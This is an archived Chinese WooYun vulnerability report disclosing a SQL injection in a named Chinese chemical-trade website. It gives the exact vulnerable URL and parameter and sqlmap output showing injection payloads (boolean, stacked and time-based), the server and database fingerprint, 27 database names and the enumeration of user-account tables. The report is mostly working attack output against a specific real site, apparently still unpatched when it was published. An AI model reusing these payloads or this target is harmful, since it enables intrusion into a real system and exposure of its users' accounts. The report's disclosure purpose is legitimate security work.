乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-01-01: 厂商已经主动忽略漏洞,细节向公众公开
中国万维化工城SQL注入(涉及27个数据库 大量用户账户)
注入点:http://www.chem.com.cn/BuyUser_show.aspx?id=848991
由于数据库太多 本屌丝机器配置也不会 跑表太慢 所以就截图一部分 并不深入去跑了
sqlmap identified the following injection points with a total of 558 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=848991 AND 3274=3274 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=848991; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=848991 WAITFOR DELAY '0:0:5'-----[22:22:41] [INFO] testing Microsoft SQL Server[22:22:42] [INFO] confirming Microsoft SQL Server[22:22:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
available databases [27]:[*] bizdb[*] blob[*] chat[*] chemdoc_bak[*] coating[*] eep[*] eepcn[*] engqsjk[*] gqsjk[*] gqsjkweb[*] LumigentDemoDB[*] master[*] model[*] msdb[*] oversea[*] Questionnaire[*] sdk[*] selphelp[*] shiyan[*] tempdb[*] test[*] user_news[*] WEBSITE[*] wwbbs[*] wwBuySelldb[*] wwuserdb[*] xxwdb
[23:00:34] [INFO] fetching tables for database: wwuserdb[23:00:34] [INFO] fetching number of tables for database 'wwuserdb'[23:00:34] [WARNING] running in a single-thread mode. Please consider usage ofption '--threads' for faster data retrieval[23:00:34] [INFO] retrieved:[23:00:36] [WARNING] reflective value(s) found and filtering out53[23:00:50] [INFO] retrieved: dbo.aspnet_Applications[23:04:55] [INFO] retrieved: dbo.aspnet_Membership[23:07:06] [INFO] retrieved: dbo.aspnet_Paths[23:08:30] [INFO] retrieved: dbo.aspnet_PersonalizationAllUsers[23:13:19] [INFO] retrieved: dbo.aspnet_PersonalizationPerUser[23:15:48] [INFO] retrieved: dbo.aspnet_Profile[23:17:23] [INFO] retrieved: dbo.aspnet_Roles[23:18:40] [INFO] retrieved: dbo.aspnet_Sc............................................
你比我懂
未能联系到厂商或者厂商积极拒绝